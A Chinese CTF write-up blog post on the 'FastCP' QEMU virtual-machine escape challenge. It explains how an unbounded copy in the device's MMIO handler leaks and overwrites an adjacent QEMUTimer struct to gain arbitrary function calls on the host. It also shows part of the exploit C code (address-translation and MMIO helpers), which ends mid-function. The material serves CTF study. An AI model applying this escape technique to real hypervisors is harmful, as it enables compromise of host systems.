<!doctype html><html lang=zh-CN data-theme=light><head><meta charset=UTF-8><meta name=viewport content="width=device-width"><meta name=theme-color content="#222" media="(prefers-color-scheme: light)"><meta name=generator content="Hugo 0.126.1"><link rel="shortcut icon" type=image/x-icon href=/imgs/icons/favicon.ico><link rel=icon type=image/x-icon href=/imgs/icons/favicon.ico><link rel=icon type=image/png sizes=16x16 href=/imgs/icons/favicon_16x16_next.png><link rel=icon type=image/png sizes=32x32 href=/imgs/icons/favicon_32_32_next.png><link rel=apple-touch-icon sizes=180x180 href=/imgs/icons/apple_touch_icon_next.png><meta itemprop=name content="FastCP"><meta itemprop=description content="集中一点,登峰造极"><meta name=description content="集中一点,登峰造极"><meta itemprop=datePublished zgotmplz><meta itemprop=dateModified zgotmplz><meta itemprop=image content="https://zp9080.github.io/imgs/author.png"><meta itemprop=keywords content="qemu pwn"><meta property="og:type" content="article"><meta property="og:title" content="FastCP"><meta property="og:description" content="集中一点,登峰造极"><meta property="og:image" content="/imgs/author.png"><meta property="og:image:width" content="312"><meta property="og:image:height" content="312"><meta property="og:image:type" content="image/jpeg/png/svg/jpg"><meta property="og:url" content="https://zp9080.github.io/post/qemu-pwn/fastcp/"><meta property="og:site_name" content="f1ow-blog"><meta property="og:locale" content="zh-CN"><meta property="article:author" content="f1ow"><meta property="article:published_time" content="2024-07-28 00:00:00 +0000 UTC"><meta property="article:modified_time" content="2024-07-28 00:00:00 +0000 UTC"><link type=text/css rel=stylesheet href=https://zp9080.github.io/3rd/font-awesome/6.6.0/css/all.min.css><link type=text/css rel=stylesheet href=https://zp9080.github.io/3rd/animate.css/4.1.1/animate.min.css><link type=text/css rel=stylesheet href=https://zp9080.github.io/3rd/viewerjs/1.11.6/viewer.min.css><link rel=stylesheet href=/css/main.min.bfbac3431de920c11b5b1cafa45029ea1bc93d5d3da50fed4ab6924b4c250360.css><script type=text/javascript>(function(){localDB={set:function(e,t,n){if(n===0)return;const s=new Date,o=n*864e5,i={value:t,expiry:s.getTime()+o};localStorage.setItem(e,JSON.stringify(i))},get:function(e){const t=localStorage.getItem(e);if(!t)return void 0;const n=JSON.parse(t),s=new Date;return s.getTime()>n.expiry?(localStorage.removeItem(e),void 0):n.value}},theme={active:function(){const e=localDB.get("theme");if(e==null)return;theme.toggle(e),window.matchMedia("(prefers-color-scheme: dark)").addListener(function(e){theme.toggle(e.matches?"dark":"light")})},toggle:function(e){document.documentElement.setAttribute("data-theme",e),localDB.set("theme",e,2);const t=document.querySelector("iframe.giscus-frame");if(t){const n={setConfig:{theme:e}};t.contentWindow.postMessage({giscus:n},"https://giscus.app")}}},theme.active()})(window)</script><script class=next-config data-name=page type=application/json>{"comments":false,"isHome":false,"isPage":true,"path":"fastcp","permalink":"https://zp9080.github.io/post/qemu-pwn/fastcp/","title":"FastCP","waline":{"js":[{"alias":"@waline/client","alias_name":"waline","file":"dist/pageview.js","name":"pageview","version":"2.15.8"},{"alias":"@waline/client","alias_name":"waline","file":"dist/comment.js","name":"comment","version":"2.15.8"}]}}</script><script type=text/javascript>document.addEventListener("DOMContentLoaded",()=>{var e=document.createElement("script");e.charset="UTF-8",e.src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js",e.async=!1,e.defer=!0,document.head.appendChild(e),e.onload=function(){NexT.utils.fmtBusuanzi()}})</script><title>FastCP - f1ow-blog</title><noscript><link rel=stylesheet href=/css/noscript.css></noscript></head><body itemscope itemtype=http://schema.org/WebPage class=use-motion><div class=headband></div><div class=overlay></div><main class=main><header class=header itemscope itemtype=http://schema.org/WPHeader><div class=header-inner><div class=site-brand-container><div class=site-nav-toggle><div class=toggle aria-label role=button><span class=toggle-line></span>
<span class=toggle-line></span>
<span class=toggle-line></span></div></div><div class=site-meta><a href=/ class=brand rel=start><i class=logo-line></i><h1 class=site-title>f1ow-blog</h1><i class=logo-line></i></a><p class=site-subtitle itemprop=description>集中一点,登峰造极</p></div><div class=site-nav-right><div class="toggle popup-trigger"><i class="fa fa-search fa-fw fa-lg"></i></div></div></div><nav class=site-nav><ul class="main-menu menu"><li class="menu-item menu-item-home"><a href=/ class=hvr-icon-pulse rel=section><i class="fa fa-home hvr-icon"></i>首页</a></li><li class="menu-item menu-item-about"><a href=/about/ class=hvr-icon-pulse rel=section><i class="fa fa-user hvr-icon"></i>关于</a></li><li class="menu-item menu-item-archives"><a href=/ class=hvr-icon-pulse rel=section><i class="fa fa-archive hvr-icon"></i>归档
<span class=badge>207</span></a></li><li class="menu-item menu-item-categories"><a href=/categories/ class=hvr-icon-pulse rel=section><i class="fa fa-categories hvr-icon"></i>分类</a></li><li class="menu-item menu-item-tags"><a href=/tags/ class=hvr-icon-pulse rel=section><i class="fa fa-tags hvr-icon"></i>标签</a></li><li class="menu-item menu-item-search"><a role=button class="popup-trigger hvr-icon-pulse"><i class="fa fa-search fa-fw hvr-icon"></i>搜索</a></li></ul></nav><div class=search-pop-overlay><div class="popup search-popup"><div class=search-header><span class=search-icon><i class="fa fa-search"></i></span><div class=search-input-container><input autocomplete=off autocapitalize=off maxlength=80 placeholder=搜索... spellcheck=false type=search class=search-input></div><span class=popup-btn-close role=button><i class="fa fa-times-circle"></i></span></div><div class="search-result-container no-result"><div class=search-result-icon><i class="fa fa-spinner fa-pulse fa-5x"></i></div></div></div></div></div><div class="toggle sidebar-toggle" role=button><span class=toggle-line></span>
<span class=toggle-line></span>
<span class=toggle-line></span></div><aside class=sidebar><div class="sidebar-inner sidebar-nav-active sidebar-toc-active"><ul class=sidebar-nav><li class=sidebar-nav-toc>文章目录</li><li class=sidebar-nav-overview>站点概览</li></ul><div class=sidebar-panel-container><div class="post-toc-wrap sidebar-panel"><div class="post-toc animated"><nav id=TableOfContents><ul><li><a href=#题目分析>题目分析</a></li><li><a href=#exp分析>exp分析</a><ul><li><a href=#mmio_write与qemu的联系>mmio_write与qemu的联系</a></li><li><a href=#userbuf和phy_userbuf>userbuf和phy_userbuf</a></li><li><a href=#qemu中的函数和exp中的函数分析>qemu中的函数和exp中的函数分析</a></li></ul></li><li><a href=#exp攻击流程>exp攻击流程</a><ul><li><a href=#任意地址的泄露>任意地址的泄露</a></li><li><a href=#任意函数的执行>任意函数的执行</a></li></ul></li></ul></nav></div></div><div class="site-overview-wrap sidebar-panel"><div class="site-author site-overview-item animated" itemprop=author itemscope itemtype=http://schema.org/Person><img class=site-author-image itemprop=image alt=f1ow src=/imgs/img-lazy-loading.gif data-src=/imgs/author.png><p class=site-author-name itemprop=name>f1ow</p><div class=site-description itemprop=description>集中一点,登峰造极</div></div><div class="site-state-wrap site-overview-item animated"><nav class=site-state><div class="site-state-item site-state-posts"><a href=/archives/><span class=site-state-item-count>207</span>
<span class=site-state-item-name>日志</span></a></div><div class="site-state-item site-state-categories"><a href=/categories/><span class=site-state-item-count>38</span>
<span class=site-state-item-name>分类</span></a></div><div class="site-state-item site-state-tags"><a href=/tags/><span class=site-state-item-count>80</span>
<span class=site-state-item-name>标签</span></a></div></nav></div><div class="links-of-social site-overview-item animated"><span class=links-of-social-item><a href=https://github.com/zp9080 title="Github → https://github.com/zp9080" rel=noopener class=hvr-icon-pulse target=_blank><i class="fab fa-github fa-fw hvr-icon"></i>
Github</a></span></div><div class="cc-license animated" itemprop=license><a href=https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh class=cc-opacity rel=noopener target=_blank title=共享知识><img src=/imgs/img-lazy-loading.gif data-src=/imgs/cc/big/by_nc_sa.svg alt=共享知识></a></div><div class="links-of-blogroll site-overview-item animated"><div class=links-of-blogroll-title><i class="fa fa-globe fa-fw"></i>
友情链接</div><ul class=links-of-blogroll-list><li class=links-of-blogroll-item><a href=https://v3rdant.cn/ title=https://v3rdant.cn/ target=_blank>v3rdant</a></li><li class=links-of-blogroll-item><a href=https://juicymio.github.io/ title=https://juicymio.github.io/ target=_blank>juicymio</a></li><li class=links-of-blogroll-item><a href=https://ka7arotto.github.io/ title=https://ka7arotto.github.io/ target=_blank>Goku</a></li></ul></div></div></div></div><div id=siteinfo-card-widget class=sidebar-card-widget><div class=item-headline><i class="fas fa-chart-line"></i>
<span>网站资讯</span></div><div class=siteinfo><div class=siteinfo-item><div class=item-name><i class="fa-solid fa-calendar-check"></i>已运行：</div><div class=item-count id=runTimes data-publishdate=2024-07-28T00:00:00+00:00></div></div><div class=siteinfo-item><div class=item-name><i class="fas fa fa-user"></i>总访客数：</div><div class=item-count id=busuanzi_value_site_uv><i class="fa fa-sync fa-spin"></i></div></div><div class=siteinfo-item><div class=item-name><i class="fas fa fa-eye"></i>页面浏览：</div><div class=item-count id=busuanzi_value_site_pv><i class="fa fa-sync fa-spin"></i></div></div><div class=siteinfo-item><div class=item-name><i class="fa fa-font"></i>总字数：</div><div class=item-count id=wordsCount data-count=273686></div></div><div class=siteinfo-item><div class=item-name><i class="fa fa-mug-hot"></i>阅读约：</div><div class=item-count id=readTimes data-times=660></div></div><div class=siteinfo-item><div class=item-name><i class="fa fa-clock-rotate-left"></i>最后更新于：</div><div class=item-count id=last-push-date data-lastpushdate=2025-02-27T17:57:37+08:00></div></div></div></div></aside><div class=sidebar-dimmer></div></header><div class=tool-buttons><div id=toggle-theme class=button title=深浅模式切换><i class="fas fa-adjust"></i></div><div class=back-to-top role=button title=返回顶部><i class="fa fa-arrow-up"></i>
<span>0%</span></div></div><div class=reading-progress-bar></div><a role=button class="book-mark-link book-mark-link-fixed"></a><a href=https://github.com/zp9080 rel="noopener external nofollow noreferrer" target=_blank title="Follow me on GitHub" class="exturl github-corner"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0 0 115 115h15l12 27L250 250V0z"/><path d="M128.3 109C113.8 99.7 119 89.6 119 89.6 122 82.7 120.5 78.6 120.5 78.6 119.2 72 123.4 76.3 123.4 76.3 127.3 80.9 125.5 87.3 125.5 87.3 122.9 97.6 130.6 101.9 134.4 103.2" fill="currentcolor" style="transform-origin:130px 106px" class="octo-arm"/><path d="M115 115C114.9 115.1 118.7 116.5 119.8 115.4l13.9-13.8C136.9 99.2 139.9 98.4 142.2 98.6 133.8 88 127.5 74.4 143.8 58 148.5 53.4 154 51.2 159.7 51 160.3 49.4 163.2 43.6 171.4 40.1 171.4 40.1 176.1 42.5 178.8 56.2 183.1 58.6 187.2 61.8 190.9 65.4 194.5 69 197.7 73.2 200.1 77.6 213.8 80.2 216.3 84.9 216.3 84.9 212.7 93.1 206.9 96 205.4 96.6 205.1 102.4 203 107.8 198.3 112.5 181.9 128.9 168.3 122.5 157.7 114.1 157.9 116.9 156.7 120.9 152.7 124.9L141 136.5C139.8 137.7 141.6 141.9 141.8 141.8z" fill="currentcolor" class="octo-body"/></svg>
</a><script type=text/javascript src=//sidecar.gitter.im/dist/sidecar.v1.js async></script><script type=text/javascript>((window.gitter={}).chat={}).options={room:"hugo-next/community"}</script><noscript><div class=noscript-warning>Theme NexT works best with JavaScript enabled</div></noscript><div class="main-inner post posts-expand"><div class=post-block><article itemscope itemtype=http://schema.org/Article class=post-content lang><link itemprop=mainEntityOfPage href=https://zp9080.github.io/post/qemu-pwn/fastcp/><span hidden itemprop=author itemscope itemtype=http://schema.org/Person><meta itemprop=image content="/imgs/author.png"><meta itemprop=name content="f1ow"></span><span hidden itemprop=publisher itemscope itemtype=http://schema.org/Organization><meta itemprop=name content="f1ow"><meta itemprop=description content="集中一点,登峰造极"></span><span hidden itemprop=post itemscope itemtype=http://schema.org/CreativeWork><meta itemprop=name content="FastCP"><meta itemprop=description content="[TOC] 主要参考了这个博客 入门qemu逃逸第一题，花了好几天时间才把所有的细节搞明白 题目分析 题目名字就是fastcp，所以ida直接搜发现这些有关"></span><header class=post-header><h1 class=post-title itemprop="name headline">FastCP
<a href=https://github.com/user-name/repo-name/tree/branch-name/subdirectory-name/post/Qemu-Pwn/FastCP.md rel="noopener external nofollow noreferrer" target=_blank class="exturl post-edit-link" title=编辑><i class="fa fa-pen-nib"></i></a></h1><div class=post-meta-container><div class=post-meta-items><span class=post-meta-item><span class=post-meta-item-icon><i class="fas fa-solid fa-calendar"></i>
</span><span class=post-meta-item-text title=发表于>发表于：
</span><time title="创建时间：2024-07-28 00:00:00 +0000 UTC" itemprop="dateCreated datePublished" datetime="2024-07-28 00:00:00 +0000 UTC">2024-07-28
</time></span><span class=post-meta-item><span class=post-meta-item-icon><i class="fas fa-solid fa-folder-open"></i>
</span><span class=post-meta-item-text title=分类于>分类于：
</span><span itemprop=about itemscope itemtype=http://schema.org/Thing><a href=/categories/qemu-pwn itemprop=url rel=index><span itemprop=name>PWN/Qemu Pwn</span></a></span></span></div><div class=post-meta-items><span class=post-meta-item title=字数><span class=post-meta-item-icon><i class="fas fa-solid fa-file-word"></i>
</span><span class=post-meta-item-text>字数：</span>
<span>2674</span>
</span><span class=post-meta-item title=阅读><span class=post-meta-item-icon><i class="fas fa-solid fa-clock"></i>
</span><span class=post-meta-item-text>阅读：&ap;</span>
<span>6分钟</span>
</span><span class=post-meta-item title=浏览><span class=post-meta-item-icon><i class="fas fa-solid fa-eye"></i>
</span><span class=post-meta-item-text>浏览：
</span><span id=busuanzi_value_page_pv data-path=/post/qemu-pwn/fastcp/><i class="fa fa-sync fa-spin"></i></span></span></div></div></header><div class="post-body autonumber" itemprop=articleBody><p>[TOC]</p><p><a href=https://www.anquanke.com/post/id/254906#h3-8 title=主要参考了这个博客 rel="noopener external nofollow noreferrer" target=_blank class=exturl>主要参考了这个博客
<i class="fa fa-external-link-alt"></i></a></p><ul><li>入门qemu逃逸第一题，花了好几天时间才把所有的细节搞明白</li></ul><h1 id=题目分析>题目分析
<a class=header-anchor href=#%e9%a2%98%e7%9b%ae%e5%88%86%e6%9e%90></a></h1><ul><li>题目名字就是fastcp，所以ida直接搜发现这些有关的 <img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/17.png alt="alt text">，一般漏洞也都是因为mmio_write，所以开始代码审计，审计过程略</li><li>在mmio_write这个函数中跟进一个函数 <img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/18.png alt="alt text"> <img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/19.png alt="alt text"> <img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/20.png alt="alt text"><img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/21.png alt="alt text">这里的函数执行竟然是通过存储的timer结构体，因此如果可以控制timer结构体意味着就可以任意函数执行</li><li>然后就是看是MMIO还是PMIO <img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/22.png alt="alt text"><img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/23.png alt="alt text"> <img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/24.png alt="alt text"> 发现resource0，那就是MMIO了</li></ul><h1 id=exp分析>exp分析
<a class=header-anchor href=#exp%e5%88%86%e6%9e%90></a></h1><h2 id=mmio_write与qemu的联系>mmio_write与qemu的联系
<a class=header-anchor href=#mmio_write%e4%b8%8eqemu%e7%9a%84%e8%81%94%e7%b3%bb></a></h2><ul><li>看到qemu中的这个函数就在想这个mmio_mem怎么和这个qemu中的这个函数联系起来</li><li><strong>应该这样理解，通过打开resource0这个设备再映射，那么往mmio_mem写入的东西会被这样处理:FastCPState *opaque和size这两个参数不用管，往mmio_mem写入东西的偏移就是addr,对应偏移的值就是val，这样一切都联系起来了</strong>
<img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/25.png alt="alt text">
<img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/26.png alt="alt text"></li></ul><h2 id=userbuf和phy_userbuf>userbuf和phy_userbuf
<a class=header-anchor href=#userbuf%e5%92%8cphy_userbuf></a></h2><ul><li>这里要先理解我们写的exp和qemu是两个不同的进程，而我们的最终目的是通过泄露出qemu中的东西然后任意函数执行最终pwn掉qemu这个宿主</li><li>地址转换这个不多赘述 <img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/27.png alt="alt text"></li><li><strong>这里的userbuf就是exp这个进程的虚拟地址，phy_userbuf就是exp这个进程的物理地址，userbuf我们可以直接通过exp里面访问到（比如说memcpy这种函数都可以），但是phy_userbuf要通过mmio_mem才能访问到，但实际上这两个位置虽然不同，但是存的东西是一样的</strong></li></ul><h2 id=qemu中的函数和exp中的函数分析>qemu中的函数和exp中的函数分析
<a class=header-anchor href=#qemu%e4%b8%ad%e7%9a%84%e5%87%bd%e6%95%b0%e5%92%8cexp%e4%b8%ad%e7%9a%84%e5%87%bd%e6%95%b0%e5%88%86%e6%9e%90></a></h2><ul><li>主要是fastcp_cp_timer这个函数,cp_info是这个函数的一个局部变量，cp_list_src要是<strong>phy_userbuf才行，因此我们不能在qemu这个进程中访问到exp进程的东西，但是却可以通过phy_userbuf访问到。同时我们可以在exp中把想要的数据复制给userbuf，这样就联系起来了</strong></li><li>cmd=4，把cp_list_src也就是phy_userbuf中的cp_info复制给qemu中的cp_info这个局部变量，然后把cp_buffer中的数据复制给dst<img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/28.png alt="alt text"></li><li>cmd=2，把src中的值复制给cp_buffer <img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/29.png alt="alt text"></li><li>cmd=1，把src的值复制给buf，再把buf的值复制给dst<img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/30.png alt="alt text"></li></ul><h1 id=exp攻击流程>exp攻击流程
<a class=header-anchor href=#exp%e6%94%bb%e5%87%bb%e6%b5%81%e7%a8%8b></a></h1><h2 id=任意地址的泄露>任意地址的泄露
<a class=header-anchor href=#%e4%bb%bb%e6%84%8f%e5%9c%b0%e5%9d%80%e7%9a%84%e6%b3%84%e9%9c%b2></a></h2><ul><li>注意到把buf的值复制到dst时没有长度限制，但是在qemu这个结构体中，buf后面就是timer这个结构体，因此可以把timer结构体的内容泄露<img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/31.png alt="alt text"></li><li>看到exp中leak_timer = *(uint64_t*)(&amp;userbuf[0x10]),这就是通过phy_userbuf这个桥梁，在exp进程中获取到了qemu进程的东西<img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/32.png alt="alt text"></li></ul><h2 id=任意函数的执行>任意函数的执行
<a class=header-anchor href=#%e4%bb%bb%e6%84%8f%e5%87%bd%e6%95%b0%e7%9a%84%e6%89%a7%e8%a1%8c></a></h2><ol><li>前面说到有cb(opaque)这个任意函数执行，因此设置相应的值就可以
<img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/33.png alt="alt text"></li><li>这里先说说这个struct_head是什么，其实就是这个结构体的头部，所以才有timer.opaque = struct_head + 0xa00 + 0x1000 + 0x30，<img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/34.png alt="alt text"> <img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/35.png alt="alt text"> <img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/36.png alt="alt text"> <img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/37.png alt="alt text"></li><li>再说说exp中的这部分 <img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/38.png alt="alt text"></li></ol><ul><li><p>src和dst都是gva_to_gpa(userbuf + 0x1000) - 0x1000 ，先把src复制到buf,因为len=0x1000 + sizeof(timer)所以buf后面的timer结构体就被修改为我们期望的样子了。后面buf复制到dst其实都不重要了，然后只要让cmd=1，也就是调用fastcp_cp_timer函数就可以任意函数执行了</p></li><li><p>这里又来了一个知识点，因此虽然是memcpy(userbuf + 0x1000, &amp;timer, sizeof(timer)); 但是后面却是gva_to_gpa(userbuf + 0x1000) - 0x1000，这是因为多于一页物理地址不一定连续了 <img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/39.png alt="alt text"></p></li><li><p>exp</p></li></ul><div class=highlight><pre tabindex=0 style=background-color:#f8f8f8;-moz-tab-size:1;-o-tab-size:1;tab-size:1><code class=language-C data-lang=C><span style=display:flex><span><span style=color:#080>#include</span> <span style=color:#080>&lt;assert.h&gt;</span><span style=color:#080>
</span></span></span><span style=display:flex><span><span style=color:#080>#include</span> <span style=color:#080>&lt;fcntl.h&gt;</span><span style=color:#080>
</span></span></span><span style=display:flex><span><span style=color:#080>#include</span> <span style=color:#080>&lt;inttypes.h&gt;</span><span style=color:#080>
</span></span></span><span style=display:flex><span><span style=color:#080>#include</span> <span style=color:#080>&lt;stdio.h&gt;</span><span style=color:#080>
</span></span></span><span style=display:flex><span><span style=color:#080>#include</span> <span style=color:#080>&lt;stdlib.h&gt;</span><span style=color:#080>
</span></span></span><span style=display:flex><span><span style=color:#080>#include</span> <span style=color:#080>&lt;string.h&gt;</span><span style=color:#080>
</span></span></span><span style=display:flex><span><span style=color:#080>#include</span> <span style=color:#080>&lt;sys/mman.h&gt;</span><span style=color:#080>
</span></span></span><span style=display:flex><span><span style=color:#080>#include</span> <span style=color:#080>&lt;sys/types.h&gt;</span><span style=color:#080>
</span></span></span><span style=display:flex><span><span style=color:#080>#include</span> <span style=color:#080>&lt;sys/io.h&gt;</span><span style=color:#080>
</span></span></span><span style=display:flex><span><span style=color:#080>#include</span> <span style=color:#080>&lt;unistd.h&gt;</span><span style=color:#080>
</span></span></span><span style=display:flex><span><span style=color:#080></span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#080>#define PAGE_SHIFT 12
</span></span></span><span style=display:flex><span><span style=color:#080>#define PAGE_SIZE (1 &lt;&lt; PAGE_SHIFT)
</span></span></span><span style=display:flex><span><span style=color:#080>#define PFN_PRESENT (1ull &lt;&lt; 63)
</span></span></span><span style=display:flex><span><span style=color:#080>#define PFN_PFN ((1ull &lt;&lt; 55) - 1)
</span></span></span><span style=display:flex><span><span style=color:#080></span><span style=color:#0b0;font-weight:700>char</span><span style=color:#666>*</span> userbuf;
</span></span><span style=display:flex><span><span style=color:#0b0;font-weight:700>uint64_t</span> phy_userbuf, phy_userbuf2;
</span></span><span style=display:flex><span><span style=color:#0b0;font-weight:700>unsigned</span> <span style=color:#0b0;font-weight:700>char</span><span style=color:#666>*</span> mmio_mem;
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>struct</span> FastCP_CP_INFO
</span></span><span style=display:flex><span>{
</span></span><span style=display:flex><span>    <span style=color:#0b0;font-weight:700>uint64_t</span> CP_src;
</span></span><span style=display:flex><span>    <span style=color:#0b0;font-weight:700>uint64_t</span> CP_cnt;
</span></span><span style=display:flex><span>    <span style=color:#0b0;font-weight:700>uint64_t</span> CP_dst;
</span></span><span style=display:flex><span>};
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>struct</span> QEMUTimer
</span></span><span style=display:flex><span>{
</span></span><span style=display:flex><span>    <span style=color:#0b0;font-weight:700>int64_t</span> expire_time;
</span></span><span style=display:flex><span>    <span style=color:#0b0;font-weight:700>int64_t</span> timer_list;
</span></span><span style=display:flex><span>    <span style=color:#0b0;font-weight:700>int64_t</span> cb;
</span></span><span style=display:flex><span>    <span style=color:#0b0;font-weight:700>void</span><span style=color:#666>*</span> opaque;
</span></span><span style=display:flex><span>    <span style=color:#0b0;font-weight:700>int64_t</span> next;
</span></span><span style=display:flex><span>    <span style=color:#0b0;font-weight:700>int</span> attributes;
</span></span><span style=display:flex><span>    <span style=color:#0b0;font-weight:700>int</span> scale;
</span></span><span style=display:flex><span>    <span style=color:#0b0;font-weight:700>char</span> shell[<span style=color:#666>0x50</span>];
</span></span><span style=display:flex><span>};
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#0b0;font-weight:700>void</span> <span style=color:#00a000>die</span>(<span style=color:#a2f;font-weight:700>const</span> <span style=color:#0b0;font-weight:700>char</span><span style=color:#666>*</span> msg)
</span></span><span style=display:flex><span>{
</span></span><span style=display:flex><span>    <span style=color:#00a000>perror</span>(msg);
</span></span><span style=display:flex><span>    <span style=color:#00a000>exit</span>(<span style=color:#666>-</span><span style=color:#666>1</span>);
</span></span><span style=display:flex><span>}
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#0b0;font-weight:700>uint64_t</span> <span style=color:#00a000>page_offset</span>(<span style=color:#0b0;font-weight:700>uint64_t</span> addr)
</span></span><span style=display:flex><span>{
</span></span><span style=display:flex><span>    <span style=color:#a2f;font-weight:700>return</span> addr <span style=color:#666>&amp;</span> ((<span style=color:#666>1</span> <span style=color:#666>&lt;&lt;</span> PAGE_SHIFT) <span style=color:#666>-</span> <span style=color:#666>1</span>);
</span></span><span style=display:flex><span>}
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#0b0;font-weight:700>uint64_t</span> <span style=color:#00a000>gva_to_gfn</span>(<span style=color:#0b0;font-weight:700>void</span><span style=color:#666>*</span> addr)
</span></span><span style=display:flex><span>{
</span></span><span style=display:flex><span>    <span style=color:#0b0;font-weight:700>uint64_t</span> pme, gfn;
</span></span><span style=display:flex><span>    <span style=color:#0b0;font-weight:700>size_t</span> offset;
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#0b0;font-weight:700>int</span> fd <span style=color:#666>=</span> <span style=color:#00a000>open</span>(<span style=color:#b44>&#34;/proc/self/pagemap&#34;</span>, O_RDONLY);
</span></span><span style=display:flex><span>    <span style=color:#a2f;font-weight:700>if</span> (fd <span style=color:#666>&lt;</span> <span style=color:#666>0</span>)
</span></span><span style=display:flex><span>    {
</span></span><span style=display:flex><span>        <span style=color:#00a000>die</span>(<span style=color:#b44>&#34;open pagemap&#34;</span>);
</span></span><span style=display:flex><span>    }
</span></span><span style=display:flex><span>    offset <span style=color:#666>=</span> ((<span style=color:#0b0;font-weight:700>uintptr_t</span>)addr <span style=color:#666>&gt;&gt;</span> <span style=color:#666>9</span>) <span style=color:#666>&amp;</span> <span style=color:#666>~</span><span style=color:#666>7</span>;
</span></span><span style=display:flex><span>    <span style=color:#00a000>lseek</span>(fd, offset, SEEK_SET);
</span></span><span style=display:flex><span>    <span style=color:#00a000>read</span>(fd, <span style=color:#666>&amp;</span>pme, <span style=color:#666>8</span>);
</span></span><span style=display:flex><span>    <span style=color:#a2f;font-weight:700>if</span> (<span style=color:#666>!</span>(pme <span style=color:#666>&amp;</span> PFN_PRESENT))
</span></span><span style=display:flex><span>        <span style=color:#a2f;font-weight:700>return</span> <span style=color:#666>-</span><span style=color:#666>1</span>;
</span></span><span style=display:flex><span>    gfn <span style=color:#666>=</span> pme <span style=color:#666>&amp;</span> PFN_PFN;
</span></span><span style=display:flex><span>    <span style=color:#a2f;font-weight:700>return</span> gfn;
</span></span><span style=display:flex><span>}
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#080;font-style:italic>//用户虚拟地址gva到用户物理地址gpa
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic>//先根据用户虚拟地址gva算出，用户所在页号gfn,再根据gfn和offset算出用户物理地址gpa（将gfn和offset位拼起来）
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic></span><span style=color:#0b0;font-weight:700>uint64_t</span> <span style=color:#00a000>gva_to_gpa</span>(<span style=color:#0b0;font-weight:700>void</span><span style=color:#666>*</span> addr)
</span></span><span style=display:flex><span>{
</span></span><span style=display:flex><span>    <span style=color:#0b0;font-weight:700>uint64_t</span> gfn <span style=color:#666>=</span> <span style=color:#00a000>gva_to_gfn</span>(addr);
</span></span><span style=display:flex><span>    <span style=color:#00a000>assert</span>(gfn <span style=color:#666>!=</span> <span style=color:#666>-</span><span style=color:#666>1</span>);
</span></span><span style=display:flex><span>    <span style=color:#a2f;font-weight:700>return</span> (gfn <span style=color:#666>&lt;&lt;</span> PAGE_SHIFT) <span style=color:#666>|</span> <span style=color:#00a000>page_offset</span>((<span style=color:#0b0;font-weight:700>uint64_t</span>)addr);
</span></span><span style=display:flex><span>}
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#080;font-style:italic>//一开始mmio_fd = open(&#34;/sys/devices/pci0000:00/0000:00:04.0/resource0&#34;, O_RDWR | O_SYNC);
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic>//mmio_mem = mmap(0, 0x100000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic></span><span style=color:#0b0;font-weight:700>void</span> <span style=color:#00a000>mmio_write</span>(<span style=color:#0b0;font-weight:700>uint64_t</span> addr, <span style=color:#0b0;font-weight:700>uint64_t</span> value)
</span></span><span style=display:flex><span>{
</span></span><span style=display:flex><span>    <span style=color:#666>*</span>((<span style=color:#0b0;font-weight:700>uint64_t</span><span style=color:#666>*</span>)(mmio_mem <span style=color:#666>+</span> addr)) <span style=color:#666>=</span> value;
</span></span><span style=display:flex><span>}
</span></span><span style=display:flex><span><span style=color:#080;font-style:italic>//这个read感觉完全没用，不用都行
</span></span></span><span style=display:flex><span><span style=color:#080;font-style:italic></span><span style=color:#0b0;font-weight:700>uint64_t</span> <span style=color:#00a000>mmio_read</span>(<span style=color:#0b0;font-weight:700>uint64_t</span> addr)
</span></span><span style=display:flex><span>{
</span></span><span style=display:flex><span>    <span style=color:#a2f;font-weight:700>return</span> <span style=color:#666>*</span>((<span style=color:#0b0;font-weight:700>uint64_t</span><span style=color:#666>*</span>)(mmio_mem <span style=color:#666>+</span> addr));
</span></span><span style=display:flex><span>}
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#0b0;font-weight:700>void</span> <span style=color:#00a000>fastcp_set_list_src</span>(<span style=color:#0b0;font-weight:700>uint64_t</span> list_addr)
</span></span><span style=display:flex><span>{
</span></span><span style=display:flex><span>    <span style=color:#00a000>mmio_write</span>(<span style=color:#666>0x8</span>, list_addr);
